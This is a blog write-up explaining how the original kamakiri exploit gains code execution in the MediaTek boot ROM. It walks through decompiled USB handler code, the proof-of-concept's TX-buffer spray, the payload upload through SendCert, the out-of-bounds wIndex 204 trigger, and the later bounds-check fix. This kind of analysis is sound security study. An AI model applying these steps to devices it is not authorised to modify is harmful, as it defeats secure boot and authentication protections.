Introduction
I’ve known about the “kamakiri” 🦗 exploit for a while now, and like many others, I’ve even used it in practice, but I never really stopped to understand how it actually works under the hood.
There are quite a lot of public MediaTek BROM exploits floating around, but despite their availability, there isn’t much in the way of clear, detailed explanations of how they function internally.
Because of that, I decided it would be a good idea to sit down and dissect one of them. I chose the original kamakiri exploit since it’s the one I’ve used the most.
FWIW, this isn’t the start of a full write-up series on all the MediaTek exploits; I’m just taking notes so I don’t forget how any of this works later (future-me is notoriously unreliable lol).
Background
On MediaTek devices, the BROM, under certain circumstances, exposes a VCOM interface that can be used to unbrick the device with the help of a Download Agent.
Naturally, this interface is typically protected by a set of security measures that prevent arbitrary payload execution or unrestricted memory access.
Since this has already been covered in the heapbait blog post, I won’t go into detail here, but the three main mechanisms are Serial Link Authorization, Download Agent Authentication, and Secure Boot Control.
The reason most of the exploits mentioned earlier were originally developed was to bypass these security measures and achieve arbitrary code execution in the BROM.
From there, this can be used to unlock the bootloader, unbrick the device, or basically do anything else you want.
Origin
Before diving into the technical details, it’s worth taking a step back to look at how and why this exploit came to be.
While it’s unclear how long this vulnerability had been known or exploited privately, the first public mention (and PoC) appeared in 2019, when k4y0z and xyz` on XDA released a method to unlock the bootloader of the Fire TV Stick 4K.
At the time, the only known BROM exploit was amonet, which was already a few years old and had been patched on newer devices.
For those unfamiliar, “kamakiri” is the Japanese word for “mantis”. The exploit takes its name from the device it was first discovered on, the Fire TV Stick 4K, whose codename is “mantis.”
It’s also worth noting that there are two “variants” of this exploit, though in reality they’re quite different under the hood.
The most commonly used one is the “v2” (kamakiri2) variant, which came later and is generally easier to work with. This post will focus on the original one.
USB Stack
To understand the exploit, you first need a rough picture of how the BROM’s USB stack is organized. It’s not complicated, but there are three specific pieces that matter:
- The transmit buffer.
- The echo protocol.
- The interface handler table.
Each one is nothing special on its own; it’s only when you look at them together that things get interesting.
The USB stack layers
Before getting into the buffers, it’s worth understanding how the USB stack is organized, because it’s a bit more layered than you might expect.
At the bottom there’s the raw USB hardware: registers, FIFOs, endpoints. USB_EPFIFOWrite talks to this level directly, writing bytes into the hardware FIFO one at a time:

    void USB_EPFIFOWrite(uint8_t nEP, uint16_t nBytes, void *pSrc) {
        USB_INDEX = nEP;

        uint8_t *p = (uint8_t *)pSrc;
        uint8_t *fifo = (uint8_t *)(nEP * 4 + 0x11100020);

        while (nBytes--) {
            *fifo = *p++;
        }
    }

Above that sits the ACM layer. USBDL_PutByte and its receive counterpart handle the staging buffers and know about packet boundaries:

    void USBDL_PutByte(uint8_t data) {
        usbacm_tx_buf.data[usbacm_tx_buf.len] = data;
        usbacm_tx_buf.len++;
        if (usbacm_tx_buf.len == packet_size) {
            USB_EPFIFOWrite(...);
            usbacm_tx_buf.len = 0;
        }
    }

But there’s another layer on top of all of this that’s easy to miss. At some point during initialization, the BROM calls IO_Init, which sets up a small function pointer table that abstracts over the two supported I/O interfaces, USB and UART:

    void IO_Init(IO_INTERFACE vio) {
        if (vio == IO_USB) {
            IO_GetData  = (code *)0x5E99; // USBDL_GetByte
            IO_PutData  = (code *)0x5EB3; // USBDL_PutByte (wrapper)
            IO_TX_Flush = (code *)0x7321; // USBDL_Flush
        } else if (vio == IO_UART) {
            IO_GetData  = (code *)0xD029; // UART_adpt_GetData
            IO_PutData  = (code *)0xD043; // UART_adpt_PutData
            IO_TX_Flush = (code *)0xD05D; // UART_CheckSendComplete
        }
    }

Whichever interface gets selected, the command handlers don’t call USBDL_PutByte directly.
Instead they go through a small serialization layer (IO_PutData32_Ex, IO_PutData16_Ex, and IO_PutByte_Ex), which breaks values down into individual bytes, most significant byte first, and feeds them into IO_PutData one at a time:
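
    void IO_PutData32_Ex(uint32_t data32, bool flush_tx) {
        for (int i = 0; i < 4; i++) {
            uint8_t byte = data32 >> (24 - i * 8); // most significant byte first
            (*IO_PutData)(&byte, 1, 0xffffffff);
        }
        if (flush_tx)
            (*IO_TX_Flush)();
    }

This means none of the command handlers need to know which interface is active; they just call IO_PutData32_Ex and let the function pointer table sort it out. From top to bottom, the full picture is: command handlers, the IO_Put*_Ex serialization helpers, the IO_PutData / IO_TX_Flush function pointers, the USBDL (or UART) routines, and finally USB_EPFIFOWrite and the hardware FIFO.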
The transmit buffer
When the BROM needs to communicate with the host, it doesn’t read from or write to the USB hardware directly.
Instead, it stages data in RAM first. There’s a receive buffer for incoming data and a transmit buffer for outgoing data.
For the receive buffer, incoming bytes from the host land there and get consumed by whatever command handler is currently running.
The transmit buffer is a structure called usbacm_tx_buf, sitting at 0x001060E0 (for MT8167):

    struct {
        uint32_t len;     // 0x001060E0 (how many bytes are currently queued)
        uint8_t  data[];  // 0x001060E4 (the actual bytes)
    } usbacm_tx_buf;

len is the write cursor: it tracks how many bytes are currently sitting in data[] waiting to be sent.
Every outgoing byte goes through USBDL_PutByte, which appends it to data[] and bumps len:

    void USBDL_PutByte(uint8_t data) {
        usbacm_tx_buf.data[usbacm_tx_buf.len] = data;
        usbacm_tx_buf.len++;
        if (usbacm_tx_buf.len == packet_size) { // 64 on FS, 512 on HS
            USB_EPFIFOWrite(txpipe->byEP, packet_size, usbacm_tx_buf.data);
            USB_EP_Bulk_Tx_Ready(txpipe->byEP);
            usbacm_tx_buf.len = 0;
        }
    }

Once len hits the packet size, the buffer gets flushed to the hardware FIFO and len resets to zero. The bytes in data[] don’t get cleared; they just sit there in RAM until something else writes over them.
There’s also USBDL_Flush(), which sends whatever’s currently queued without waiting for the buffer to fill up:

    void USBDL_Flush(void) {
        if (nDevState == DEVSTATE_CONFIG && usbacm_tx_buf.len != 0) {
            uint8_t nEP = txpipe->byEP;
            gUSBAcm_IsInEPComplete = false;
            USB_EPFIFOWrite(nEP, usbacm_tx_buf.len, usbacm_tx_buf.data);
            USB_EP_Bulk_Tx_Ready(nEP);
            while (!gUSBAcm_IsInEPComplete)
                USB_HISR();
            usbacm_tx_buf.len = 0;
        }
    }

Same result: len resets to zero, bytes stay in RAM. This “stale bytes” behavior is going to matter a lot later.
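To make the stale-bytes behavior concrete, here is a toy Python model of the buffer. It is only a sketch: the TxBuf class and its sent list are made up for illustration, and the 64-byte size simply assumes the full-speed packet size mentioned above.

```python
PACKET_SIZE = 64  # assumption: full-speed packet size, per the USBDL_PutByte comment


class TxBuf:
    """Toy model of usbacm_tx_buf: a cursor plus a data area that is never cleared."""

    def __init__(self, size=PACKET_SIZE):
        self.len = 0
        self.data = bytearray(size)
        self.sent = []  # packets handed to the imaginary hardware FIFO

    def put_byte(self, value):
        self.data[self.len] = value
        self.len += 1
        if self.len == len(self.data):  # packet full: send it and rewind
            self._send()

    def flush(self):
        if self.len != 0:
            self._send()

    def _send(self):
        self.sent.append(bytes(self.data[:self.len]))
        self.len = 0  # only the cursor is reset; data[] keeps its contents


buf = TxBuf()
for b in b"\x00\x0a\x10\x00":
    buf.put_byte(b)
buf.flush()

print(buf.len)             # 0
print(buf.data[:4].hex())  # 000a1000
```

After the flush the cursor is back at zero, but the four bytes are still sitting in data[], which is exactly the property the exploit leans on.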
BROM command loop
BROM doesn’t always end up in the command loop; this only happens when it boots into USBDL mode. There are a few reasons this can happen.
The most common ones are a missing or invalid Preloader, a shorted eMMC, or a device that’s simply blank from the factory. Some devices also expose a button combo that forces USBDL mode at boot.
Whatever the cause, once the BROM decides it’s in USBDL mode, it initializes the USB stack and starts waiting for the host to interact with it.
The loop reads a command byte and dispatches it to the appropriate handler:

    void BromCmdLoop(void) {
        BromCmdLoop_Init();

        while (true) {
            uint8_t cmd = IO_GetByte();
            IO_PutByte_Ex(cmd, true); // echo cmd

            switch (cmd) {
            case 0xD1: BromCmd_Read(CMD_LEN_32, false); break;
            case 0xD4: BromCmd_Write(CMD_LEN_32, true); break;
            case 0xE0: BromCmd_SendCert(); break;
            case 0xFD: BromCmd_Get_HW_Code(); break;
            // ...
            }
        }
    }

There are quite a few commands, but the ones relevant to this exploit are:
- 0xD1 (BromCmd_Read): read arbitrary memory and echo it back
- 0xD4 (BromCmd_Write): write arbitrary memory
- 0xE0 (BromCmd_SendCert): load a blob into memory at a fixed address
Every one of these handlers echoes its arguments back before doing anything.
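From the host side, that echo behavior turns every write into a write-then-verify step. A minimal sketch of the pattern follows; LoopbackDevice and send_with_echo are hypothetical names of mine, not part of the PoC, and sending the address most significant byte first is an assumption based on how IO_PutData32_Ex serializes values.

```python
class LoopbackDevice:
    """Hypothetical stand-in for the BROM side: echoes whatever the host writes."""

    def __init__(self):
        self._pending = bytearray()

    def write(self, data):
        self._pending += data

    def read(self, size):
        out = bytes(self._pending[:size])
        del self._pending[:size]
        return out


def send_with_echo(dev, data):
    """Write data, read back the same number of bytes, and check they match."""
    dev.write(data)
    echoed = dev.read(len(data))
    if echoed != data:
        raise RuntimeError(f"echo mismatch: sent {data.hex()}, got {echoed.hex()}")
    return echoed


dev = LoopbackDevice()
send_with_echo(dev, b"\xD1")                          # command byte
send_with_echo(dev, (0x10007050).to_bytes(4, "big"))  # address (byte order assumed)
```

The important side effect for the exploit is not the verification itself but the fact that every echoed byte passes through the TX buffer on its way out.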
The interface handler table
When the BROM receives a USB control request on endpoint 0, it hands it off to USB_Endpoint0_Idle.
This function is responsible for parsing the request and dispatching it to the appropriate handler:

    void USB_Endpoint0_Idle(void) {
        USB_EPFIFORead(0, 8, &cmd);

        if ((cmd.bmRequestType & USB_CMD_TYPEMASK) == 0) {
            // standard requests
            switch (cmd.bRequest) {
            case 0x05: stall = USB_Cmd_SetAddress(&ep0info, &cmd); break;
            case 0x06: stall = USB_Cmd_GetDescriptor(&ep0info, &cmd); break;
            case 0x09: stall = USB_Cmd_SetConfiguration(&ep0info, &cmd); break;
            case 0x0b: stall = USB_Cmd_SetInterface(&ep0info, &cmd); break;
            // ...
            }
            return;
        }

        // class specific requests
        if ((cmd.bmRequestType & 0x60) != 0x20) {
            USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);
            return;
        }

        if ((cmd.bmRequestType != 0xA1) && (cmd.bmRequestType != 0x21)) {
            USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);
            return;
        }

        if (if_info[(byte)cmd.wIndex].if_class_specific_hdlr != NULL) {
            (*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd);
            return;
        }

        USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);
    }

Standard requests like SetAddress or GetDescriptor are handled inline, whereas class-specific requests (identified by bmRequestType having the class bit set) get dispatched through a different path.
For those, the BROM looks up the handler in if_info, a table of interface descriptors sitting at 0x00103780.
Each entry is 0x34 bytes and contains, among other things, a function pointer at offset +0x04:

    struct Usb_Interface_Info {
        char     *interface_name;          // +0x00
        void     *if_class_specific_hdlr;  // +0x04 (function pointer)
        uint16_t  ifdscr_size;             // +0x08
        // ...
    };

When a class-specific request comes in, the BROM takes cmd.wIndex, uses it as an index into if_info, and calls the handler directly:

    (*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd);

There are only three registered interfaces, but nothing stops you from requesting wIndex=200, or wIndex=204, or any other value that lands outside the legitimate interface entries.
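Since the index is never bounds-checked, it’s worth asking which wIndex values make the handler slot fall inside the transmit buffer. The sketch below uses the MT8167 addresses from this post; TX_DATA_SIZE is my assumption (one 64-byte full-speed packet), and the helper names are made up.

```python
IF_INFO_BASE = 0x00103780  # base of if_info (MT8167)
ENTRY_SIZE = 0x34          # size of one Usb_Interface_Info entry
HDLR_OFFSET = 0x04         # offset of if_class_specific_hdlr
TX_DATA_BASE = 0x001060E4  # usbacm_tx_buf.data
TX_DATA_SIZE = 64          # assumption: one full-speed packet


def handler_slot(w_index):
    """Address the BROM reads the handler pointer from for a given wIndex."""
    idx = w_index & 0xFF  # mirrors the (byte) cast in the dispatch code
    return IF_INFO_BASE + idx * ENTRY_SIZE + HDLR_OFFSET


def lands_in_tx_buf(w_index):
    slot = handler_slot(w_index)
    return TX_DATA_BASE <= slot and slot + 4 <= TX_DATA_BASE + TX_DATA_SIZE


hits = [i for i in range(256) if lands_in_tx_buf(i)]
print(hits)                     # [204]
print(hex(handler_slot(204)))   # 0x1060f4
```

Under that 64-byte assumption, 204 is the only index whose handler pointer overlaps data[]; a larger data area would let a few higher indices work too.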
Walking through the PoC
Now that we have a somewhat solid understanding of the USB stack, let’s walk through the exploit step by step.
The PoC we’ll be looking at can be found here. There are probably other versions floating around, but they all do the same thing in the end.
Handshake and setup

    dev.handshake()
    dev.write32(0x10007000, 0x22000000)

Before anything else, the host needs to establish communication with the BROM. The handshake is a simple four-byte sequence.
BROM expects A0 0A 50 05 and responds with the bitwise complement of each byte. Once that’s done, it is ready to accept commands.
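As a quick sanity check, the replies the host should expect can be computed directly from that description. This is just the arithmetic, not the PoC’s actual handshake code; expected_reply is a made-up helper name.

```python
HANDSHAKE = bytes([0xA0, 0x0A, 0x50, 0x05])


def expected_reply(byte):
    """Bitwise complement of one handshake byte, kept within 8 bits."""
    return ~byte & 0xFF


replies = bytes(expected_reply(b) for b in HANDSHAKE)
print(replies.hex())  # 5ff5affa
```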
If the device was entered via a hardware short on the eMMC, the user also needs to release the short at this point before continuing.
The PoC handles this with a small thread that kicks the watchdog every second while waiting for user input:

    thread = UserInputThread()
    thread.start()
    while not thread.done:
        dev.write32(0x10007008, 0x1971)  # kick watchdog
        time.sleep(1)

Once the short is released and the thread signals done, execution continues with the rest of the exploit.
The TX buffer spray
The next thing the PoC does is manipulate the TX buffer:
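
    addr = 0x10007050
    dev.write32(addr, [0xA1000])
    cnt = 15
    for i in range(cnt):
        dev.read32(addr - (cnt - i) * 4, cnt - i + 1)

The goal is to get the bytes 00 0A 10 00 to land at a specific offset inside usbacm_tx_buf, the one that corresponds to if_info[wIndex].if_class_specific_hdlr for the wIndex we plan to use in the trigger step. The word written is 0x000A1000 because the BROM echoes 32-bit values most significant byte first; read back by the little-endian CPU, those four bytes form the pointer 0x00100A00, which is the payload address.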
WDT_BASE + 0x50 is used as the scratch address because it falls inside the watchdog register region, one of the memory regions the BROM allows you to access freely.
What the register itself does doesn’t really matter; what matters is that it’s accessible without triggering any access violations.
write32(addr, [0xA1000]) plants 0x000A1000 there. From that point, the loop issues a series of reads with increasing start addresses and decreasing sizes, each one ending exactly at addr.
Each iteration starts one word further forward and reads one word fewer than the last, so the final word of every read is the planted value:

    i=0:  read32(addr - 60, 16)
    i=1:  read32(addr - 56, 15)
    ...
    i=14: read32(addr - 4, 2)    (last word = addr = 0x000A1000)

Every one of those reads echoes its data back through USBDL_PutByte, accumulating in the TX buffer. The exact offsets depend on the memory layout of the specific BROM.
The end result is the same: 0x000A1000 ends up sitting at the right offset inside usbacm_tx_buf to overlap with if_info[wIndex].if_class_specific_hdlr.
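The effect of the loop is easier to see in a small simulation. This is a rough sketch under several assumptions of mine, none confirmed from the BROM code: the data area is 64 bytes, each read’s data phase starts at data[0] (because the echoed arguments were flushed just before), status words are ignored, and the neighbouring watchdog registers hold a made-up FILLER value.

```python
import struct

SCRATCH = 0x10007050  # WDT_BASE + 0x50, from the PoC
VALUE = 0x000A1000    # word planted by write32
CNT = 15
FILLER = 0xDEADBEEF   # hypothetical contents of the neighbouring registers


def read_word(address):
    """Fake memory: the planted word at SCRATCH, filler everywhere else."""
    return VALUE if address == SCRATCH else FILLER


tx_data = bytearray(64)  # assumption: 64-byte data area, cursor at 0 for each read

for i in range(CNT):
    start = SCRATCH - (CNT - i) * 4
    words = CNT - i + 1
    for n in range(words):
        # IO_PutData32_Ex emits each word most significant byte first
        tx_data[n * 4:n * 4 + 4] = struct.pack(">I", read_word(start + n * 4))

slot = bytes(tx_data[16:20])              # data[16] corresponds to 0x1060F4
print(slot.hex())                         # 000a1000
print(hex(struct.unpack("<I", slot)[0]))  # 0x100a00
```

Because every read is one word shorter than the previous one and always ends on the planted word, each read leaves one more copy behind. In this model the value ends up at every word offset from 4 to 60, regardless of what the filler registers contain.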
Loading the payload
For the exploit to work, there has to be a way to upload arbitrary code into memory. Thankfully, BromCmd_SendCert (0xE0) does exactly that.
It was probably designed to receive a certificate blob from the host and load it into memory at 0x100A00 for verification.

    def attempt2(d):
        d.write(b"\xE0")
        result = d.read(1)       # echo of the command byte
        d.write(p32(0xA00))
        result = d.read(4)       # echo of the length
        payload = load_payload_file("../brom-payload/stage1/stage1.bin")
        d.write(payload)

The host sends 0xA00 as the length, the BROM echoes it back, then reads that many bytes into 0x100A00. On the BROM side:

    uint32_t BromCmd_SendCert(void) {
        uint32_t len = IO_GetData32();
        IO_PutData32_Ex(len, true);

        if (!bExecOnce) {
            bExecOnce = true;
            if (Secure_SCTRL_CERT_IsValidRange(len) < 0xff) {
                IO_PutData16_Ex(status, true);
                IO_GetDataBlock8(0x100A00, len, 5);  // payload lands here
                Secure_SCTRL_CERT_Verify(0x100A00);  // fails, but doesn't clean up
            }
        }

        IO_PutData16_Ex(status, true);
        return status;
    }

The detail here is that the data gets written to memory before verification runs. The cert check will fail since we’re not sending anything valid, but BROM never cleans up the memory afterwards.
The only real constraint is size: the payload must fit within 0xA00 bytes, which is solved by using a two-stage approach.
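A host-side guard for that size limit could look something like the sketch below. prepare_stage1 is a hypothetical helper, not something from the PoC, and it assumes that zero-padding the blob up to the announced length is harmless for stage1.

```python
CERT_MAX_LEN = 0xA00  # length the PoC announces to BromCmd_SendCert


def prepare_stage1(payload, size=CERT_MAX_LEN):
    """Reject oversized payloads and zero-pad smaller ones (padding is an assumption)."""
    if len(payload) > size:
        raise ValueError(f"payload is {len(payload)} bytes, limit is {size}")
    return payload + b"\x00" * (size - len(payload))


blob = prepare_stage1(b"\x01\x02\x03\x04")
print(len(blob))  # 2560
```

Anything that doesn’t fit has to move into the second stage, which stage1 is then responsible for loading.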
Pulling the trigger
At this point the two pieces are in place: the payload is sitting at 0x100A00 and usbacm_tx_buf has been sprayed with 0x000A1000 at the right offset. All that’s left is to trigger the jump.
To confirm this, here’s a hexdump of usbacm_tx_buf taken from inside the stage1 payload immediately after it starts running:

    001060E0  00 00 00 00 A1 A2 A3 A4 00 0A 10 00 00 0A 10 00  |................|
    001060F0  00 0A 10 00 00 0A 10 00 00 0A 10 00 00 0A 10 00  |................|

len is zero (the buffer was flushed), and 0x000A1000 repeats throughout data[]. The value at data[16] = 0x1060F4 is what matters: that’s where if_info[204].if_class_specific_hdlr lives:

    >>> hex(0x00103780 + 204 * 0x34 + 4)
    '0x1060f4'

0x00103780 is the base address of if_info, 0x34 is the size of each entry, 204 is the index, and +4 is the offset of if_class_specific_hdlr within the entry.
The result lands exactly at 0x1060F4, inside usbacm_tx_buf.data[]. The trigger is a USB control request:

    try:
        udev.ctrl_transfer(0xA1, 0, 0, 204, 0)
    except usb.core.USBError as e:
        print(e)

0xA1 is bmRequestType with the direction bit (0x80) and the class bit (0x20) set, and the recipient field set to interface (0x01). This translates to a class-specific request to an interface, from device to host.
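For reference, the bmRequestType fields can be decoded with a few lines of Python. The field layout follows the USB specification; passes_brom_checks mirrors the two checks in USB_Endpoint0_Idle shown earlier, and both function names are my own.

```python
def decode_bm_request_type(value):
    """Split bmRequestType into (direction, type, recipient)."""
    direction = "device-to-host" if value & 0x80 else "host-to-device"
    req_type = ("standard", "class", "vendor", "reserved")[(value >> 5) & 0x3]
    recipients = {0: "device", 1: "interface", 2: "endpoint", 3: "other"}
    recipient = recipients.get(value & 0x1F, "reserved")
    return direction, req_type, recipient


def passes_brom_checks(value):
    """Mirror the class-request checks that precede the if_info lookup."""
    return (value & 0x60) == 0x20 and value in (0xA1, 0x21)


print(decode_bm_request_type(0xA1))  # ('device-to-host', 'class', 'interface')
print(passes_brom_checks(0xA1))      # True
```

Both 0xA1 and 0x21 get past the checks, so either direction would reach the handler lookup.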
wIndex=204 is what gets used to index into if_info. USB_Endpoint0_Idle receives the request and does:

    (*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd);

if_info[204].if_class_specific_hdlr holds the bytes 00 0A 10 00 (put there by the spray), which the CPU reads as the little-endian pointer 0x00100A00, so execution jumps straight to the payload at 0x100A00.
The stage1 payload confirms it’s running by sending back 0xA1A2A3A4:

    data = d.read(4)
    if data != b"\xA1\xA2\xA3\xA4":
        raise RuntimeError("...")

If that comes back, the exploit succeeded and the payload is running.
Fixes
The vulnerability was patched at some point. The first chip where the fix was publicly identified is the MT6853, seen in 2021, but it may have been patched earlier on other chips.
The fix itself is straightforward: a simple bounds check on wIndex before the handler dispatch:

    // vulnerable
    if (if_info[(byte)cmd.wIndex].if_class_specific_hdlr != NULL) {
        (*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd);
        return;
    }

    // fixed
    if (((byte)cmd.wIndex < 3) &&
        (handler = if_info[(byte)cmd.wIndex].if_class_specific_hdlr, handler != NULL)) {
        (*handler)();
        return;
    }

There are only three registered interfaces, so any wIndex >= 3 now gets rejected outright. The OOB access into if_info is no longer possible.
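The difference between the two versions can be modeled in a few lines. This is a toy sketch: slots maps an index to whatever 32-bit value sits in that entry’s handler field, and the handler addresses for the three legitimate interfaces are placeholders I made up.

```python
REGISTERED = 3  # number of registered interfaces

# index -> value found in that entry's handler field
slots = {
    0: 0x00001111,   # hypothetical legitimate handlers
    1: 0x00002222,
    2: 0x00003333,
    204: 0x00100A00,  # attacker-controlled bytes from the TX buffer
}


def dispatch_vulnerable(w_index):
    """Return the address the unpatched BROM would call, or None."""
    handler = slots.get(w_index & 0xFF, 0)
    return handler or None


def dispatch_fixed(w_index):
    """Same lookup, but with the bounds check from the patched BROM."""
    idx = w_index & 0xFF
    if idx >= REGISTERED:
        return None
    return slots.get(idx, 0) or None


print(hex(dispatch_vulnerable(204)))  # 0x100a00
print(dispatch_fixed(204))            # None
```

Legitimate indices behave the same in both versions; only the out-of-range lookup changes.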
On the BromCmd_SendCert side, the patched BROM also zeroes out the memory at 0x100A00 if verification fails:

    if (verify_failed) {
        memset((void *)0x100A00, 0, len); // clean up on failure
    }

So even if the jump could somehow be triggered, there’d be nothing useful at 0x100A00 to land on.
Conclusion
Seven years. That’s how long it took me to actually sit down and understand an exploit I’ve been using since forever. Better late than never I guess.
And honestly, now that I understand how it works, I’m surprised at how “simple” it actually is, at least compared to a lot of the other exploits that I’ve looked at.
I wasn’t even planning to make this a whole post; this was meant to be my own documentation for future reference, but I figured it might be useful for others as well. I hope it was informative.